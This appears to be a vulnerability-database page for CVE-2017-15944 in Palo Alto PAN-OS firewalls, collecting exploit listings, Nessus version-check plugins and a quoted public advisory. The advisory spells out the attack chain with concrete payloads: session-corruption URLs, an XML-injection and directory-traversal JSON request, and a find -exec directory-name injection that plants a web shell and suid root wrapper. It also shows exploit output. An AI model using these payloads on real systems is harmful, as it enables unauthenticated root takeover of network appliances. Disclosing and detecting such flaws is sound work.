Vulnerabilities > CVE-2017-15944 - Unspecified vulnerability in Paloaltonetworks Pan-Os
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
HIGH Integrity impact
HIGH Availability impact
HIGH Summary
Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.
Vulnerable Configurations
Exploit-Db
description Palo Alto Networks - 'readSessionVarsFromFile()' Session Corruption (Metasploit). CVE-2017-15944. Remote exploit for Unix platform. Tags: Metasploit Framewor... file exploits/unix/remote/44597.rb id EDB-ID:44597 last seen 2018-05-24 modified 2018-05-08 platform unix port 443 published 2018-05-08 reporter Exploit-DB source https://www.exploit-db.com/download/44597/ title Palo Alto Networks - 'readSessionVarsFromFile()' Session Corruption (Metasploit) type remote description Palo Alto Networks Firewalls - Remote root Code Execution. CVE-2017-15944. Remote exploit for Hardware platform file exploits/hardware/remote/43342.txt id EDB-ID:43342 last seen 2017-12-14 modified 2017-12-14 platform hardware port published 2017-12-14 reporter Exploit-DB source https://www.exploit-db.com/download/43342/ title Palo Alto Networks Firewalls - Remote root Code Execution type remote
Metasploit
| description | This module exploits a chain of vulnerabilities in Palo Alto Networks products running PAN-OS versions prior to 6.1.19, 7.0.19, 7.1.14, and 8.0.6. This chain starts by using an authentication bypass flaw to to exploit an XML injection issue, which is then abused to create an arbitrary directory, and finally gains root code execution by exploiting a vulnerable cron script. This module uses an initial reverse TLS callback to stage arbitrary payloads on the target appliance. The cron job used for the final payload runs every 15 minutes by default and exploitation can take up to 20 minutes. |
| id | MSF:EXPLOIT/LINUX/HTTP/PANOS_READSESSIONVARS |
| last seen | 2020-06-13 |
| modified | 2019-03-23 |
| published | 2018-05-05 |
| references | |
| reporter | Rapid7 |
| source | https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/panos_readsessionvars.rb |
| title | Palo Alto Networks readSessionVarsFromFile() Session Corruption |
Nessus
NASL family Palo Alto Local Security Checks NASL id PALO_ALTO_PAN-OS_8_0_6.NASL description The version of Palo Alto Networks PAN-OS running on the remote host is 8.0.x prior to 8.0.6. It is, therefore, affected by multiple vulnerabilities. last seen 2020-06-01 modified 2020-06-02 plugin id 104811 published 2017-12-15 reporter This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/104811 title Palo Alto Networks PAN-OS 8.0.x < 8.0.6 Multiple Vulnerabilities code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(104811); script_version("1.9"); script_cvs_date("Date: 2018/08/01 13:59:45"); script_cve_id("CVE-2017-15942", "CVE-2017-15944"); script_bugtraq_id(102075, 102079); script_name(english:"Palo Alto Networks PAN-OS 8.0.x < 8.0.6 Multiple Vulnerabilities"); script_summary(english:"Checks the PAN-OS version."); script_set_attribute(attribute:"synopsis", value: "The remote PAN-OS host is affected by multiple vulnerabilities."); script_set_attribute(attribute:"description",value: "The version of Palo Alto Networks PAN-OS running on the remote host is 8.0.x prior to 8.0.6. It is, therefore, affected by multiple vulnerabilities."); # https://securityadvisories.paloaltonetworks.com/Home/Detail/96 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?06c321db"); # https://securityadvisories.paloaltonetworks.com/Home/Detail/102 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?d9a7eb24"); # https://www.paloaltonetworks.com/documentation/80/pan-os/pan-os-release-notes/pan-os-8-0-6-addressed-issues script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?32570e85"); script_set_attribute(attribute:"solution", value: "Upgrade to Palo Alto Networks PAN-OS version 8.0.6 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Palo Alto Networks readSessionVarsFromFile() Session Corruption'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2017/12/05"); script_set_attribute(attribute:"patch_publication_date", value:"2017/12/05"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/12/15"); script_set_attribute(attribute:"plugin_type", value:"combined"); script_set_attribute(attribute:"cpe", value:"cpe:/o:paloaltonetworks:pan-os"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"Palo Alto Local Security Checks"); script_copyright(english:"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("palo_alto_version.nbin"); script_require_keys("Host/Palo_Alto/Firewall/Version", "Host/Palo_Alto/Firewall/Full_Version"); exit(0); } include("vcf.inc"); app_name = "Palo Alto Networks PAN-OS"; app_info = vcf::get_app_info(app:app_name, kb_ver:"Host/Palo_Alto/Firewall/Full_Version", webapp:true); vcf::check_granularity(app_info:app_info, sig_segments:2); constraints = [ { "min_version" : "8.0", "fixed_version" : "8.0.6" } ]; vcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);NASL family Palo Alto Local Security Checks NASL id PALO_ALTO_PAN-OS_6_1_19.NASL description The version of Palo Alto Networks PAN-OS running on the remote host is 6.1.x prior to 6.1.19. It is, therefore, affected by multiple vulnerabilities. last seen 2020-06-01 modified 2020-06-02 plugin id 105295 published 2017-12-15 reporter This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/105295 title Palo Alto Networks PAN-OS 6.1.x < 6.1.19 Multiple Vulnerabilities code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(105295); script_version("1.6"); script_cvs_date("Date: 2018/08/01 13:59:45"); script_cve_id( "CVE-2017-15940", "CVE-2017-15942", "CVE-2017-15943", "CVE-2017-15944" ); script_bugtraq_id( 102074, 102075, 102076, 102079 ); script_name(english:"Palo Alto Networks PAN-OS 6.1.x < 6.1.19 Multiple Vulnerabilities"); script_summary(english:"Checks the PAN-OS version."); script_set_attribute(attribute:"synopsis", value: "The remote PAN-OS host is affected by multiple vulnerabilities."); script_set_attribute(attribute:"description",value: "The version of Palo Alto Networks PAN-OS running on the remote host is 6.1.x prior to 6.1.19. It is, therefore, affected by multiple vulnerabilities."); # https://securityadvisories.paloaltonetworks.com/Home/Detail/96 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?06c321db"); # https://securityadvisories.paloaltonetworks.com/Home/Detail/99 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?2462d7e7"); # https://securityadvisories.paloaltonetworks.com/Home/Detail/102 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?d9a7eb24"); # https://securityadvisories.paloaltonetworks.com/Home/Detail/105 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?bbe4facb"); # https://www.paloaltonetworks.com/documentation/61/pan-os/pan-os-release-notes/pan-os-6-1-19-addressed-issues script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?fa24076a"); script_set_attribute(attribute:"solution", value: "Upgrade to Palo Alto Networks PAN-OS version 6.1.19 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Palo Alto Networks readSessionVarsFromFile() Session Corruption'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2017/12/05"); script_set_attribute(attribute:"patch_publication_date", value:"2017/12/05"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/12/15"); script_set_attribute(attribute:"plugin_type", value:"combined"); script_set_attribute(attribute:"cpe", value:"cpe:/o:paloaltonetworks:pan-os"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"Palo Alto Local Security Checks"); script_copyright(english:"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("palo_alto_version.nbin"); script_require_keys("Host/Palo_Alto/Firewall/Version", "Host/Palo_Alto/Firewall/Full_Version"); exit(0); } include("vcf.inc"); app_name = "Palo Alto Networks PAN-OS"; app_info = vcf::get_app_info(app:app_name, kb_ver:"Host/Palo_Alto/Firewall/Full_Version", webapp:true); vcf::check_granularity(app_info:app_info, sig_segments:2); constraints = [ { "min_version" : "6.1", "fixed_version" : "6.1.19" } ]; vcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);NASL family CGI abuses NASL id PALO_ALTO_PAN-SA-2017-0027_REMOTE.NASL description The Palo Alto Networks PAN-OS running on the remote host is affected by a remote code execution vulnerability in the management interface due to improper validation of user-supplied input when handling HTTP requests. An unauthenticated, remote attacker can exploit this, via a series of specially crafted requests, to cause remote code execution in the context of the highest privileged user. Note that PAN-OS is reportedly affected by other vulnerabilities as well; however, Nessus has not tested for these. last seen 2020-06-01 modified 2020-06-02 plugin id 105376 published 2017-12-20 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/105376 title Palo Alto Networks PAN-OS Management Interface RCE (PAN-SA-2017-0027) NASL family Palo Alto Local Security Checks NASL id PALO_ALTO_PAN-OS_7_1_14.NASL description The version of Palo Alto Networks PAN-OS running on the remote host is 7.1.x prior to 7.1.14. It is, therefore, affected by multiple vulnerabilities. last seen 2020-06-01 modified 2020-06-02 plugin id 105298 published 2017-12-15 reporter This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/105298 title Palo Alto Networks PAN-OS 7.1.x < 7.1.14 Multiple Vulnerabilities NASL family Palo Alto Local Security Checks NASL id PALO_ALTO_PAN-OS_7_0_19.NASL description The version of Palo Alto Networks PAN-OS running on the remote host is 7.0.x prior to 7.0.19. It is, therefore, affected by multiple vulnerabilities. last seen 2020-06-01 modified 2020-06-02 plugin id 105296 published 2017-12-15 reporter This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/105296 title Palo Alto Networks PAN-OS 7.0.x < 7.0.19 Multiple Vulnerabilities
Packetstorm
data source https://packetstormsecurity.com/files/download/145496/pan-inject.txt id PACKETSTORM:145496 last seen 2017-12-20 published 2017-12-19 reporter Zerial source https://packetstormsecurity.com/files/145496/Palo-Alto-Networks-PAN-OS-Cookie-Injection.html title Palo Alto Networks PAN-OS Cookie Injection data source https://packetstormsecurity.com/files/download/145396/pan-exec.txt id PACKETSTORM:145396 last seen 2017-12-13 published 2017-12-13 reporter Philip Pettersson source https://packetstormsecurity.com/files/145396/Palo-Alto-Networks-Firewalls-Remote-Root-Code-Execution.html title Palo Alto Networks Firewalls Remote Root Code Execution data source https://packetstormsecurity.com/files/download/147523/panos_readsessionvars.rb.txt id PACKETSTORM:147523 last seen 2018-05-08 published 2018-05-07 reporter H D Moore source https://packetstormsecurity.com/files/147523/Palo-Alto-Networks-readSessionVarsFromFile-Session-Corruption.html title Palo Alto Networks readSessionVarsFromFile() Session Corruption
Seebug
| bulletinFamily | exploit |
| description | This is a public advisory for CVE-2017-15944 which is a remote root code execution bug in Palo Alto Networks firewalls. Three separate bugs can be used together to remotely execute commands as root through the web management interface without authentication on: PAN-OS 6.1.18 and earlier, PAN-OS 7.0.18 and earlier, PAN-OS 7.1.13 and earlier, PAN-OS 8.0.5 and earlier. Palo Alto Networks recommends not exposing the web management interface to the internet. By looking at Project Sonar or Shodan it is evident that it's actually quite common to deploy the firewalls with the web management interface listening on the WAN port. PAN-OS 6.1.19, PAN-OS 7.0.19, PAN-OS 7.1.14 and PAN-OS 8.0.6 are patched and can be downloaded from https://support.paloaltonetworks.com/ ### DESCRIPTION #### Bug #1: Partial authentication bypass The file `/etc/appweb3/conf/common.conf` contains the web configuration for the web server that handles the web management interface. It configures an authentication filter on most subdirectories using the following format: ``` <Location /php> panAuthCheck on </Location> ``` This means that all requests to `/php/*` will be checked for an authenticated session cookie. The functionality itself is implemented in the `libpanApiWgetFilter.so` library file. The function `openAuthFilter()` will look for the PHPSESSID cookie and then call the `readSessionVarsFromFile()` function on the session file to extract the `dloc` and `user` values. The problem is that `readSessionVarsFromFile()` is not using the official PHP functions to read the serialized session data, but its own parser using `strtok()` which is not implemented correctly. The PHP session format which `readSessionVarsFromFile()` tries to parse looks like this for string values: ``` locale|s:2:"en"; ``` Explained: ``` var_name|s:str_length:"string value"; var_name|s:str_length:"another string";... ``` If we can inject a value into the session file that contains the `";` character sequence, we can break the parser and inject our own value for the `user` variable. We can do this by calling the `/esp/cms_changeDeviceContext.esp` script, which does not need any kind of authentication to be called. It will call the `panUserSetDeviceLocation()` function located in `panmodule.so`, which splits the `dloc` GET parameter by ":" and sets the `dloc` and `loc` session variables to the second value. We can corrupt the session file by calling the following url: `/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";` Which produces the following contents in `/tmp/sess_<sessionid>`: `dloc|s:20:"8:a'";user|s."1337";";loc|s:27:"16:a'";user|s."1337";:vsys1";` When this is parsed by the `readSessionVarsFromFile()` function, it will extract `16:a'` as the value for the `user` variable. It will then use this in XML requests to the backend to check if the user is authenticated, but this produces an XML injection that results in an invalid XML document: ``` Entity: line 1: parser error : attributes construct error <request cmd='op' cookie='16:a'' refresh='no'><operations xml='yes'><show><cli> ``` The extra single quote character is injected into the cookie value, which makes the request fail because of a parser error. Interestingly enough, the `panCheckSessionExpired()` function in `libpanApiWgetFilter.so` does not recognize this unexpected state and believes that authentication has succeeded. We can now access any PHP file protected by the panAuthCheck directive using our manipulated session cookie. Example: ``` imac:~/pa% curl -H "Cookie: PHPSESSID=hacked;" 10.0.0.1/php/utils/debug.php <!DOCTYPE html> <html><head><title>Moved Temporarily</title></head> <body><h1>Moved Temporarily</h1> <p>The document has moved <a href="http://10.0.0.1:28250/php/logout.php ">here</a>.</p> <address>PanWeb Server/ - at 127.0.0.1:28250 Port 80</address></body> </html> imac:~/pa% curl -H "Cookie: PHPSESSID=hacked;" ' 10.0.0.1/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";' @start@Success@end@ imac:~/pa% curl -H "Cookie: PHPSESSID=hacked;" 10.0.0.1/php/utils/debug.php 2>/dev/null|head -30 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" " http://www.w3.org/TR/html4/loose.dtd";> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <title>Debug Console</title> ``` It's important to note that we still don't have a valid, logged in session. Most PHP scripts will fail, but we do bypass the authentication check in the web server. #### Bug #2: Arbitrary directory creation The `/php/utils/router.php` file handles API requests for the web management interface backend communication. It exposes most of the PHP classes that comprise the web application in a simple remote procedure call interface over HTTP POST/JSON. The `/php/device/Administrator.php` file declares the `Administrator` class. It contains a method called `get` that we can call from `router.php`. In the `get` method there is an XML injection in the call to `Direct::getConfigByXpath`. The `jsonArgs->id` parameter is appended to the request without any sanitation. This allows us to manipulate the XML request that is sent to the backend. Normal request: ``` <request cmd="get" obj="/config/mgt-config/users/entry[@name='admin']" cookie="12312312312"/> ``` We can inject our own values into the end of the `obj` attribute, and therefore control all of the remaining XML request. The `pan_cfg_req_ctxt_construct()` function in `libpanmp_mp.so` handles the parsing of XML requests in the backend. If we send a request tag with the `async-mode='yes'` attribute set, the backend will create a temporary file and parent directory in `/opt/pancfg/session/pan/user_tmp/<cookie value>/<jobid>.xml` that contains the output of the request. Since we can control the `<cookie value>` part of the created directory structure, we can use a directory traversal attack to create a directory with an arbitrary name anywhere on the system. For example, by sending the following crafted POST request: ``` {"action":"PanDirect","method":"execute","data": ["07c5807d0d927dcd0980f86024e5208b","Administrator.get", {"changeMyPassword":true,"template":"asd","id":"admin']\" async-mode='yes' refresh='yes' cookie='../../../../../../tmp/hacked'/>\u0000"}],"type":"rpc","tid":713} ``` The backend receives the following XML request, resulting in the `/tmp/hacked` directory being created: ``` <request cmd="get" obj="/config/mgt-config/users/entry[@name='admin']" async-mode="yes" refresh="yes" cookie="../../../../../../tmp/hacked"/> ``` #### Bug #3: Command injection in cron script There is a cron entry that executes `/usr/local/bin/genindex_batch.sh` every 15 minutes. This shellscript will in turn execute `/usr/local/bin/genindex.sh` to generate indexes from database files in `/opt/pancfg/mgmt/logdb/`. There is a command injection vulnerability in how this shellscript handles filename processing: ``` <redacted at the request of PA networks> ``` Since we can create directories in `$PAN_BASE_DIR/logdb/$dir/1`, we are able to influence the output of the first `find` command. This output is then used as an argument in the second execution of `find`, but without enclosing quotes. We can therefore inject arbitrary arguments in this invocation. By passing the `-exec` option to `find`, we can make it execute arbitrary system commands. My exploit creates a directory called: `* -print -exec python -c exec("[base64 code..]".decode("base64")) ;` The base64-encoded python code will be executed as root, which creates a simple web shell in `/var/appweb/htdocs/api/c.php` as well as a suid root wrapper in `/bin/x`. ##### EXPLOIT OUTPUT ``` imac:~/pa% python panos-rce.py http://10.0.0.1/ creating corrupted session... http://10.0.0.1/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27 ";user|s."1337"; done, verifying.. http://10.0.0.1/php/utils/debug.php panAuthCheck bypassed verifying that directory creation works.. http://10.0.0.1/php/utils/router.php/Administrator.get http://10.0.0.1/api/test/202.xml creating /opt/pancfg/mgmt/logdb/traffic/1/ entry shell at http://10.0.0.1/api/c.php should be created in 8 minutes.. please wait web shell created, rootshell accessible with /bin/x -p -c 'command' uid=99(nobody) gid=99(nobody) euid=0(root) Linux PA-3060 2.6.32.27-7.1.10.0.30 #1 SMP Thu May 4 20:10:01 PDT 2017 x86_64 x86_64 x86_64 GNU/Linux $ ``` |
| id | SSV:96983 |
| last seen | 2017-12-25 |
| modified | 2017-12-14 |
| published | 2017-12-14 |
| reporter | Root |
| source | https://www.seebug.org/vuldb/ssvid-96983 |
| title | Palo Alto Networks firewalls remote root code execution(CVE-2017-15944) |
References
- http://www.securityfocus.com/bid/102079
- http://www.securityfocus.com/bid/102079
- http://www.securitytracker.com/id/1040007
- http://www.securitytracker.com/id/1040007
- https://security.paloaltonetworks.com/CVE-2017-15944
- https://security.paloaltonetworks.com/CVE-2017-15944
- https://www.exploit-db.com/exploits/43342/
- https://www.exploit-db.com/exploits/43342/
- https://www.exploit-db.com/exploits/44597/
- https://www.exploit-db.com/exploits/44597/